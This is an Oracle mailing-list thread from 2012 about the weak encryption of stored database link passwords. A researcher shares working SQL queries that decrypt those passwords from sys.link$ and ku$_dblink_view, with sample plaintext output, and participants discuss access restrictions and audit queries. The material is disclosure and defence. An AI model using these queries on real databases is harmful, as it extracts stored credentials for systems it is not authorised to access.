RE: Database Link Security et al

  • From: "Powell, Mark" <mark.powell2@xxxxxx>
  • To: "oracle-l@xxxxxxxxxxxxx" <oracle-l@xxxxxxxxxxxxx>
  • Date: Wed, 28 Nov 2012 19:16:05 +0000

I was unable to read the ku$ view as a DBA so if you have to be a sysdba user 
to read the view how much of a problem is this really? 
 

-----Original Message-----
From: oracle-l-bounce@xxxxxxxxxxxxx [mailto:oracle-l-bounce@xxxxxxxxxxxxx] On 
Behalf Of oracle@xxxxxxxxxxxxx
Sent: Wednesday, November 28, 2012 12:19 PM
To: oracle-l@xxxxxxxxxxxxx
Subject: Re: Database Link Security et al


Hi ****

Your question below is a good one, as I have had a number of other direct 
offline emails about the same topic since my original posting, which I will 
answer here in one go.

The solution proposed of restricting access to sys.link$ is the well known 
remediation - but it does not solve this issue unfortunately, as you will see 
below the dblink ciphertexts are selectable through ku$_dblink_view as well, 
hence the wider visibility of the link passwords.

SQL> select name, userid,
utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)),
4353, (substr(passwordx,3,16)))) passwd from ku$_dblink_view;

NAME
--------------------------------------------------------------------------------
USERID
------------------------------
PASSWD
--------------------------------------------------------------------------------
TEST_LINK.ENTERPRISE.INTERNAL.UK
DBLINK_ACCOUNT
mongo

(11.2.0.1)

I will be presenting additional new research, exclusive to UKOUG, on Monday.

Cheers,
Paul
http://2012.ukoug.org/default.asp?p=9339&dlgact=shwprs&prs_prsid=7736&day_dayid=62


On 11/27/2012, "********" <*********@*****.com> wrote:

>Hi Paul
>Could you share the paper if that is ok.
>I am interested in the automated solution for the db link security issue.
>ONe thing is basically restrict access to link$.
>
>Thank you
>****
>
>
>
>On Sun, Nov 25, 2012 at 12:18 PM, <oracle@xxxxxxxxxxxxx> wrote:
>
>>
>> So, users can decrypt dblink passwords as the key is included in the 
>> ciphertext... -->
>>
>> SQL> select name, userid,
>> utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)),
>> 4353, (substr(passwordx,3,16)))) from sys.link$ where 
>> name='TEST_LINK';
>>
>> NAME
>>
>> ---------------------------------------------------------------------
>> -----------
>> USERID
>> ------------------------------
>> PASSWORD
>>
>> ---------------------------------------------------------------------
>> -----------
>> TEST_LINK
>> DBLINK_ACCOUNT
>> MYPW
>>
>> ..one saving grace is that we can now identify incoming db links 
>> using this..
>>
>> select userid, terminal, comment$text from sys.aud$ where 
>> comment$text like 'DBLINK%';
>> USERID         NTIMESTAMP#          USERHOST  COMMENT$TEXT
>> ------------  -----------------     -------   --------------
>> DBLINK_ACCOUNT  19-NOV-12 01.42.16.305194000    orlin   DBLINK_INFO:
>> (SOURCE_GLOBAL_NAME=orcl.4294967295)
>>
>> -->could be too late though so best to take a few precautions in
>> advance... preferably automated...
>>
>> ..Same with lack of profiles on SYS account. Sometimes easier to fix 
>> ourselves..
>>
>> create or replace trigger sys_throttler.tra_servererror_ora1017
>> after servererror on database
>> declare
>>    l_db_usr varchar2 (32);
--
//www.freelists.org/webpage/oracle-l


--
//www.freelists.org/webpage/oracle-l

Other related posts:

  1. Home
  2. oracle-l
  3. Archive
  4. 11-2012